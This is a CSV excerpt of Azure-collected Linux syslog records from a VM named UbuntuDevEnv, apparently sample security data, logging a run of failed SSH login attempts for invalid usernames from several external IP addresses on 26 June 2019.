+16366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:58,UbuntuDevEnv,2019-06-26 07:05:57,auth,UbuntuDevEnv,info,Failed password for invalid user werkstatt from 64.202.187.152 port 60064 ssh2,38370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,werkstatt,64.202.187.1,60064,,
+16367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:58,UbuntuDevEnv,2019-06-26 07:05:57,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 60064:11: Bye Bye [preauth],38370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,60064,,
+16368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:05:58,UbuntuDevEnv,2019-06-26 07:05:57,auth,UbuntuDevEnv,info,Disconnected from invalid user werkstatt 64.202.187.152 port 60064 [preauth],38370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,werkstatt,64.202.187.1,60064,,
+16369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:06:12,UbuntuDevEnv,2019-06-26 07:06:12,auth,UbuntuDevEnv,info,Invalid user mscuser from 46.101.149.230 port 38326,38435,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mscuser,46.101.149.2,38326,,
+16370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:06:12,UbuntuDevEnv,2019-06-26 07:06:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38435,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:06:12,UbuntuDevEnv,2019-06-26 07:06:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,38435,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:06:15,UbuntuDevEnv,2019-06-26 07:06:14,auth,UbuntuDevEnv,info,Failed password for invalid user mscuser from 46.101.149.230 port 38326 ssh2,38435,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mscuser,46.101.149.2,38326,,
+16373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:06:15,UbuntuDevEnv,2019-06-26 07:06:14,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 38326:11: Bye Bye [preauth],38435,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,38326,,
+16374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:06:15,UbuntuDevEnv,2019-06-26 07:06:14,auth,UbuntuDevEnv,info,Disconnected from invalid user mscuser 46.101.149.230 port 38326 [preauth],38435,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mscuser,46.101.149.2,38326,,
+16375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:08,UbuntuDevEnv,2019-06-26 07:07:08,auth,UbuntuDevEnv,info,Invalid user mia from 45.55.190.46 port 49268,38532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mia,45.55.190.4,49268,,
+16376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:08,UbuntuDevEnv,2019-06-26 07:07:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,38532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:08,UbuntuDevEnv,2019-06-26 07:07:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:10,UbuntuDevEnv,2019-06-26 07:07:10,auth,UbuntuDevEnv,info,Failed password for invalid user mia from 45.55.190.46 port 49268 ssh2,38532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mia,45.55.190.4,49268,,
+16379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:11,UbuntuDevEnv,2019-06-26 07:07:10,auth,UbuntuDevEnv,info,Disconnected from invalid user mia 45.55.190.46 port 49268 [preauth],38532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mia,45.55.190.4,49268,,
+16380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:11,UbuntuDevEnv,2019-06-26 07:07:10,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 49268:11: Bye Bye [preauth],38532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,49268,,
+16381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:18,UbuntuDevEnv,2019-06-26 07:07:17,auth,UbuntuDevEnv,info,Invalid user bbbb from 138.68.29.52 port 42534,38664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bbbb,138.68.29.5,42534,,
+16382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:18,UbuntuDevEnv,2019-06-26 07:07:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,38664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:18,UbuntuDevEnv,2019-06-26 07:07:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:19,UbuntuDevEnv,2019-06-26 07:07:19,auth,UbuntuDevEnv,info,Failed password for invalid user bbbb from 138.68.29.52 port 42534 ssh2,38664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bbbb,138.68.29.5,42534,,
+16385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:20,UbuntuDevEnv,2019-06-26 07:07:19,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 42534:11: Bye Bye [preauth],38664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,42534,,
+16386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:20,UbuntuDevEnv,2019-06-26 07:07:19,auth,UbuntuDevEnv,info,Disconnected from invalid user bbbb 138.68.29.52 port 42534 [preauth],38664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bbbb,138.68.29.5,42534,,
+16387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:24,UbuntuDevEnv,2019-06-26 07:07:24,auth,UbuntuDevEnv,info,Invalid user allison from 206.189.118.156 port 60556,38694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,allison,206.189.118.1,60556,,
+16388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:24,UbuntuDevEnv,2019-06-26 07:07:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:24,UbuntuDevEnv,2019-06-26 07:07:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,38694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:26,UbuntuDevEnv,2019-06-26 07:07:25,auth,UbuntuDevEnv,info,Failed password for invalid user allison from 206.189.118.156 port 60556 ssh2,38694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,allison,206.189.118.1,60556,,
+16391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:26,UbuntuDevEnv,2019-06-26 07:07:25,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 60556:11: Bye Bye [preauth],38694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,60556,,
+16392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:26,UbuntuDevEnv,2019-06-26 07:07:25,auth,UbuntuDevEnv,info,Disconnected from invalid user allison 206.189.118.156 port 60556 [preauth],38694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,allison,206.189.118.1,60556,,
+16393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:26,UbuntuDevEnv,2019-06-26 07:07:26,auth,UbuntuDevEnv,info,Invalid user lei from 64.202.187.152 port 49266,38700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lei,64.202.187.1,49266,,
+16394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:26,UbuntuDevEnv,2019-06-26 07:07:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:26,UbuntuDevEnv,2019-06-26 07:07:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,38700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:29,UbuntuDevEnv,2019-06-26 07:07:28,auth,UbuntuDevEnv,info,Failed password for invalid user lei from 64.202.187.152 port 49266 ssh2,38700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lei,64.202.187.1,49266,,
+16397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:29,UbuntuDevEnv,2019-06-26 07:07:28,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 49266:11: Bye Bye [preauth],38700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,49266,,
+16398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:29,UbuntuDevEnv,2019-06-26 07:07:28,auth,UbuntuDevEnv,info,Disconnected from invalid user lei 64.202.187.152 port 49266 [preauth],38700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lei,64.202.187.1,49266,,
+16399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:48,UbuntuDevEnv,2019-06-26 07:07:48,auth,UbuntuDevEnv,info,Invalid user ba from 87.101.240.10 port 34952,38773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,87.101.240.1,34952,,
+16400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:48,UbuntuDevEnv,2019-06-26 07:07:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:48,UbuntuDevEnv,2019-06-26 07:07:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,38773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:50,UbuntuDevEnv,2019-06-26 07:07:50,auth,UbuntuDevEnv,info,Failed password for invalid user ba from 87.101.240.10 port 34952 ssh2,38773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,87.101.240.1,34952,,
+16403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:50,UbuntuDevEnv,2019-06-26 07:07:50,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 34952:11: Bye Bye [preauth],38773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,34952,,
+16404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:07:50,UbuntuDevEnv,2019-06-26 07:07:50,auth,UbuntuDevEnv,info,Disconnected from invalid user ba 87.101.240.10 port 34952 [preauth],38773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ba,87.101.240.1,34952,,
+16405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:33,UbuntuDevEnv,2019-06-26 07:08:32,auth,UbuntuDevEnv,info,Invalid user nagios from 46.101.149.230 port 55448,38934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,46.101.149.2,55448,,
+16406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:33,UbuntuDevEnv,2019-06-26 07:08:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:33,UbuntuDevEnv,2019-06-26 07:08:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,38934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:35,UbuntuDevEnv,2019-06-26 07:08:35,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 46.101.149.230 port 55448 ssh2,38934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,46.101.149.2,55448,,
+16409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:35,UbuntuDevEnv,2019-06-26 07:08:35,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 46.101.149.230 port 55448 [preauth],38934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,46.101.149.2,55448,,
+16410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:35,UbuntuDevEnv,2019-06-26 07:08:35,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 55448:11: Bye Bye [preauth],38934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,55448,,
+16411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:50,UbuntuDevEnv,2019-06-26 07:08:50,auth,UbuntuDevEnv,info,Invalid user zach from 138.68.29.52 port 59852,39000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zach,138.68.29.5,59852,,
+16412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:50,UbuntuDevEnv,2019-06-26 07:08:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:50,UbuntuDevEnv,2019-06-26 07:08:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,39000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:53,UbuntuDevEnv,2019-06-26 07:08:53,auth,UbuntuDevEnv,info,Failed password for invalid user zach from 138.68.29.52 port 59852 ssh2,39000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zach,138.68.29.5,59852,,
+16415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:53,UbuntuDevEnv,2019-06-26 07:08:53,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 59852:11: Bye Bye [preauth],39000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,59852,,
+16416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:53,UbuntuDevEnv,2019-06-26 07:08:53,auth,UbuntuDevEnv,info,Disconnected from invalid user zach 138.68.29.52 port 59852 [preauth],39000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zach,138.68.29.5,59852,,
+16417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:56,UbuntuDevEnv,2019-06-26 07:08:56,auth,UbuntuDevEnv,info,Invalid user admin from 206.189.118.156 port 49774,39021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,206.189.118.1,49774,,
+16418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:56,UbuntuDevEnv,2019-06-26 07:08:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,39021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:56,UbuntuDevEnv,2019-06-26 07:08:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:58,UbuntuDevEnv,2019-06-26 07:08:57,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 206.189.118.156 port 49774 ssh2,39021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,206.189.118.1,49774,,
+16421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:58,UbuntuDevEnv,2019-06-26 07:08:57,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 206.189.118.156 port 49774 [preauth],39021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,206.189.118.1,49774,,
+16422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:08:58,UbuntuDevEnv,2019-06-26 07:08:57,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 49774:11: Bye Bye [preauth],39021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,49774,,
+16423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:03,UbuntuDevEnv,2019-06-26 07:09:02,auth,UbuntuDevEnv,info,Invalid user himanshu from 64.202.187.152 port 38468,39051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,64.202.187.1,38468,,
+16424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:03,UbuntuDevEnv,2019-06-26 07:09:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,39051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:03,UbuntuDevEnv,2019-06-26 07:09:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
